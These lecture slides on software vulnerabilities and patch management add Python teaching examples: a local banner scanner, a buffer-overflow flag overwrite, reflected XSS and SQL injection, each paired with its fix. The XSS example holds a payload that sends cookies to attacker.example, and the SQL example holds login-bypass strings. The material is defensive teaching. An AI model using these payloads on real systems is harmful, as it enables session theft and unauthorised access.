Vulnerabilities
• flaws in systems that allow them to be exploited
• provide means for attackers to compromise hosts, servers and networks
Vulnerabilities
• 2 flavors
• bugs – programming mistakes
• errors in code that can crash or hang a system, leave it in an insecure state, or allow root access
• incorrect firewall/router/IDS rules
• flaws – improper design
• failing to account for all possibilities in the design leads to code whose 'features' are themselves vulnerabilities; no amount of bug-fixing removes a flaw, the design has to change
Vulnerabilities
• 2-edged sword
• publishing vulnerabilities and patches is the only way to get the problem fixed
• once published, the attacker community knows about the vulnerability too, and can compare the patch with the old code to locate it
• patch management is a MAJOR security problem!
Vulnerabilities
• ‘Security by Obscurity’
• attempts to use secrecy to prevent knowledge of vulnerabilities
• vendors of proprietary code are often accused of this
• zero-day attack
• an attack that exploits a vulnerability before a patch is available, often before the vendor even knows the vulnerability exists; defenders have had 'zero days' to prepare
Between a ‘rock and a hard place’
• what do you do if you discover a vulnerability in a product and a patch is not available?
• do you keep it secret until a patch is developed?
• this leaves customers vulnerable
• the vendor may not work to fix it since there is no pressure
• do you publicize it to put pressure on the vendor?
• knowing that by doing so you have notified all of the hacker community
Between a ‘rock and a hard place’
Example 1:
• in 2009 Microsoft announced a vulnerability in the SMB subsystem that could leave servers open to a DoS attack
• there was no patch yet
• IT managers had two choices
• disable SMB – meaning some systems would not work
• wait for patch and pray there would not be an incident
Between a ‘rock and a hard place’
Example 2:
• in 2008 a Mass. Dist. Judge ordered MIT students to NOT present information at DefCon regarding a vulnerability in the MTA ‘CharlieTicket’ system
• judge said intent was not to silence students but enforce a reasonable period during which a fix could be found
• the gag order was overturned, but not until after DefCon had concluded
http://www.informationweek.com/news/security/vulnerabilities/210002185
Vulnerability Management
• many strategies for managing vulnerabilities
• vulnerability scanners
• vulnerability notification
• vulnerability information online through CERT
• vulnerability and penetration testing services
• these go hand-in-hand with adequate patch management
Vulnerability Scanners
• programs that scan a network, host or application for known vulnerabilities
• Types
• port scanner – looks for open ports (nmap)
• network enumerator – provides information on groups, usernames, shares and services (nmap and nessus)
• network vulnerability scanner – looks for vulnerabilities in network resources and servers (nessus, SAINT)
• Web application security scanner – looks for vulnerabilities in Web servers and scripts (SAINT, Metasploit Pro)
• Database security scanner – looks for vulnerabilities in DBMS and SQL code (Safety Lab Shadow)
Vulnerability Notification
• many vendors will either mail a notification or post to a Web site when a vulnerability has been found and how to patch it
• services exist that maintain vulnerability lists for multiple products and will provide notification
• with many of these you provide a list of the software and versions in your organization
Vulnerability Notification
• examples
• Vupen Security vulnerability services
http://www.vupen.com/english/services/
• SecureNet Solutions vulnerability notification service
http://www.securenetsol.com/am_trial_terms.html
• Secunia CSI free for home users
http://secunia.com/vulnerability_scanning/personal/
Vulnerability Notification
• CERT (Computer Emergency Response Team) at CMU
• provides weekly list of known vulnerabilities
• organization security team matches inventory of software and versions to this list
http://www.cert.org/advisories/
http://www.us-cert.gov/cas/bulletins/
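The two activities on the preceding slides, scanning for open services and matching the software inventory against a vulnerability list, can be shown in one small program. The block below is an added example written for this page; it is not code from the slides or from any of the products named. It is a toy network vulnerability scanner: it connects to each port, grabs the service banner, parses a product name and version out of it, and compares that against a constructed advisory list (the product names, versions and advisory text are hypothetical). The `demo()` function stands up two throwaway listeners on 127.0.0.1 so the example runs offline.

```python
import re
import socket
import threading

# Constructed advisory feed, standing in for a CERT bulletin or vendor
# notification list. Products and versions are hypothetical.
ADVISORIES = [
    {"product": "ExampleFTPd", "fixed_in": (2, 4, 1),
     "note": "remote overflow in USER command; update to 2.4.1 or later"},
    {"product": "DemoHTTP", "fixed_in": (1, 9, 0),
     "note": "directory traversal; update to 1.9.0 or later"},
]

# Matches "Product/1.2.3", "Product 1.2.3" or "Product_1.2" inside a banner.
BANNER_RE = re.compile(r"([A-Za-z][\w-]*)[/ _](\d+(?:\.\d+)+)")


def parse_banner(banner):
    """Return (product, version tuple) from a banner, or None if unrecognised."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    return m.group(1), tuple(int(x) for x in m.group(2).split("."))


def match_advisories(inventory, advisories=ADVISORIES):
    """inventory: [(product, version tuple)] -> [(product, version, advisory note)].

    This is the inventory-to-bulletin matching step. Comparing version
    tuples gives numeric rather than lexical ordering, so 2.10 > 2.9."""
    findings = []
    for product, version in inventory:
        for adv in advisories:
            if adv["product"].lower() == product.lower() and version < adv["fixed_in"]:
                findings.append((product, ".".join(map(str, version)), adv["note"]))
    return findings


def grab_banner(host, port, timeout=1.0):
    """None if the port is closed/filtered, '' if open but silent, else the banner."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256).decode("latin-1", "replace").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None


def scan(host, ports, timeout=1.0):
    """Port scan, service enumeration and vulnerability matching in one pass."""
    open_ports, inventory = [], []
    for port in ports:
        banner = grab_banner(host, port, timeout)
        if banner is None:
            continue
        open_ports.append(port)
        parsed = parse_banner(banner)
        if parsed:
            inventory.append(parsed)
    return open_ports, inventory, match_advisories(inventory)


def _fake_service(banner):
    """Throwaway listener on 127.0.0.1 that sends one banner; returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner.encode())
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo():
    """Scan two constructed local services; returns (open ports, inventory, findings)."""
    ports = [_fake_service("220 ExampleFTPd/2.3.0 ready\r\n"),
             _fake_service("DemoHTTP/1.9.0\r\n")]
    return scan("127.0.0.1", ports)


if __name__ == "__main__":
    for finding in demo()[2]:
        print("VULNERABLE:", finding)
```

Real scanners do the same three things with far better product fingerprinting and a much larger advisory database; the point to keep is that the banner match is only as good as the inventory it is compared against, and a service that lies about its version (or is silent) is a gap in the scan, which is why the slides pair scanners with notification services and an inventory of what is actually installed.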
Threats – the counterpart to vulnerabilities
• Threats exploit vulnerabilities
• vulnerability – you left your car unlocked
• threat – criminals going through shopping center parking lots looking for unlocked cars
• Fortinet’s FortiGuard Center Threat Research and Response Center provides Threat reports and advisories
http://www.fortiguard.com/
• Awareness of threat landscape can help to prioritize vulnerabilities
Top 3 Application Vulnerabilities
1 – Buffer overflow
• software may not enforce array bounds
• input longer than the buffer (an array used for I/O) overwrites whatever sits next to it in memory: other variables, a saved return address, or code pointers
• some malware works this way, 'smashing the stack' to redirect execution into attacker-supplied code
• mainly aimed at programs that run with privileged rights, since the injected code inherits those rights
• best addressed in design and programming (bounds checks, safe string functions, memory-safe languages)
• patches can often fix this in vendor-supplied software
http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html
http://www.youtube.com/watch?v=kZZgNnhxA_4 (6 min)
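The mechanism behind the bullet "overwrites whatever sits next to it in memory" can be made concrete without writing C. The block below is an added example, not from the slides: it uses `ctypes` to lay out a struct with a fixed 8-byte name buffer followed directly by an `is_admin` flag (a constructed layout), then copies attacker-sized input into the buffer with no bounds check, exactly like `strcpy()` into a fixed array. The overrun lands in the flag. The bounds-checked version beside it rejects the same input. The only liberty taken is that the unsafe copy is capped at the struct's own size so the demonstration cannot corrupt the interpreter; a real overflow has no such cap.

```python
import ctypes
import sys

NAME_SIZE = 8


class Session(ctypes.Structure):
    """Constructed layout: an 8-byte name buffer immediately followed by a
    privilege flag at offset 8, like C's struct { char name[8]; int is_admin; }."""
    _fields_ = [("name", ctypes.c_char * NAME_SIZE),
                ("is_admin", ctypes.c_int32)]


def layout():
    """(offset of is_admin, total struct size): (8, 12) on any normal ABI."""
    return Session.is_admin.offset, ctypes.sizeof(Session)


def set_name_unsafe(session, data):
    # BUG: copies len(data) bytes with no check against NAME_SIZE, like
    # strcpy()/memcpy() with an attacker-controlled length. Bytes past
    # offset 8 land in is_admin. The only cap kept here is the struct's own
    # size, so this demo cannot scribble over the interpreter's heap.
    n = min(len(data), ctypes.sizeof(session))
    ctypes.memmove(ctypes.addressof(session), data, n)


def set_name_safe(session, data):
    """Bounds-checked copy: refuse input that leaves no room for a NUL terminator."""
    if len(data) >= NAME_SIZE:
        return False
    session.name = data
    return True


def overflow_payload():
    """8 filler bytes to fill the buffer, then the bytes of int 1 in native
    byte order, so the overrun sets is_admin = 1."""
    return b"A" * NAME_SIZE + (1).to_bytes(4, sys.byteorder)


def demo_unsafe():
    s = Session()                       # zero-initialised: is_admin == 0
    set_name_unsafe(s, overflow_payload())
    return s.name, s.is_admin           # (b'AAAAAAAA', 1): flag overwritten


def demo_safe():
    s = Session()
    accepted = set_name_safe(s, overflow_payload())
    return accepted, s.is_admin         # (False, 0): input rejected, flag intact
```

Overwriting a flag is the simplest outcome; when the adjacent memory is a saved return address on the stack, the same overrun redirects execution, which is what "smashing the stack" refers to.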
Top 3 Application Vulnerabilities
According to CERT
2 – cross-site scripting
• attacker-controlled script is injected into pages served by a trusted Web site and runs in the victim's browser with that site's privileges (cookies, session)
• used as a delivery step in some 'drive-by' attacks
• often relies on social engineering to get the user to follow a crafted link (banks are especially targeted)
• Web script writers can validate input and encode output for the context it lands in (HTML body, attribute, URL, JavaScript)
• disabling scripts in the browser (although not always practical)
• use of a least-privilege account
http://www.ibm.com/developerworks/tivoli/library/s-csscript/
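The "validate input and encode output" advice above is best understood by seeing the bug beside the fix. The following is an added example for this page, not code from the slides or the linked article. It renders a constructed search-results page in two ways: by pasting the search term straight into the HTML (reflected XSS) and by encoding it for each output context it lands in. The template, the attacker host `attacker.example` and the payload are all constructed for the example.

```python
import html
from urllib.parse import quote

# Constructed page template: the search term appears in two contexts,
# HTML body text and a URL query parameter inside an href attribute.
TEMPLATE = ('<h1>Results for: {q}</h1>\n'
            '<a href="/search?q={q_url}">search again</a>')

# Constructed payload: if the page runs it, the session cookie is sent to
# the attacker. A victim reaches it by following a crafted link.
PAYLOAD = ('<script>new Image().src="http://attacker.example/?c="'
           '+document.cookie</script>')


def render_vulnerable(query):
    # BUG: untrusted input pasted verbatim into the HTML and into the URL.
    return TEMPLATE.format(q=query, q_url=query)


def render_fixed(query):
    # Encode per output context: HTML entities for body text (quote=True also
    # makes it safe inside attribute values), percent-encoding for the URL.
    return TEMPLATE.format(q=html.escape(query, quote=True),
                           q_url=quote(query, safe=""))


def contains_live_script(page):
    """Crude check for the demo: would a browser see a <script> element?"""
    return "<script" in page.lower()
```

Input validation alone does not solve this (a search box legitimately accepts `<` and `"`); output encoding for the right context is what stops the browser from treating data as markup.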
Top 3 Application Vulnerabilities
According to CERT
3 – SQL injection
• input from a Web form is concatenated into a SQL statement, so a quote or comment marker in the input changes the statement the DBMS executes
• can bypass authentication, read or alter other users' data, and on some DBMSs run commands and gain control of the server
• solution is to use parameterized queries (prepared statements) so input is bound as data, not SQL text; input validation helps but is not sufficient on its own
http://www.youtube.com/watch?v=jMQ2wdOmMIA (3 min)
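The two classic login-bypass payloads and the fix can be run end to end against an in-memory database. The block below is an added example for this page, not code from the slides or the linked video. It builds a constructed `users` table in SQLite, implements the login check once by string concatenation and once with bound parameters, and runs the same payloads through both. Passwords are stored in plaintext only to keep the example short.

```python
import sqlite3


def make_db():
    """In-memory database with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return db


def login_vulnerable(db, name, password):
    # BUG: form input becomes part of the SQL text, so a quote in the input
    # ends the string literal and whatever follows is parsed as SQL.
    sql = (f"SELECT name, role FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_fixed(db, name, password):
    # Parameterised query: the statement shape is fixed by the code and the
    # values are bound as data, so quotes and comment markers stay inert.
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone()


# Constructed payloads typed into the login form.
COMMENT_OUT = "alice' --"     # closes the literal, comments out the password check
ALWAYS_TRUE = "' OR '1'='1"   # makes the WHERE clause end in ... OR '1'='1'


def demo():
    """Run both payloads through both implementations; returns the rows found."""
    db = make_db()
    return {
        "vuln_comment": login_vulnerable(db, COMMENT_OUT, "wrong"),   # alice, no password
        "vuln_or": login_vulnerable(db, "nobody", ALWAYS_TRUE),       # first row, any user
        "fixed_comment": login_fixed(db, COMMENT_OUT, "wrong"),       # None
        "fixed_or": login_fixed(db, "nobody", ALWAYS_TRUE),           # None
        "fixed_real": login_fixed(db, "bob", "hunter2"),              # bob's row
    }
```

The parameterised version still returns bob's row for a correct password, so nothing legitimate is lost; the database simply never sees the attacker's quotes as SQL. Stripping quotes from input would block these two payloads but not the many encodings and DBMS-specific variants, which is why binding parameters, not filtering, is the fix.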
Vulnerability Management
Gartner defines 6 steps for vulnerability management
• Define policy
• Baseline the environment
• Prioritize vulnerabilities
• Shield the environment (temporary compensating controls such as firewall or IPS rules while a fix is pending)
• Mitigate vulnerabilities
• Maintain and monitor
Patch Management
• requires coordinated effort
• knowing which patches are available
• testing patches
• scheduling patch installation
http://www.patchmanagement.org/pmessentials.asp
• however – many systems remain unpatched
• some applications (such as Firefox) push patches automatically
• others (such as Adobe) leave the decision to the user
Patch Management
• although recognized as a major security problem, patch management is seen as a burden by traditional IT management
• it sucks up resources
• it adds nothing to the bottom line
http://www.computerworld.com.au/article/44872/patch_management_burdens_customers/?fp=16&fpid=0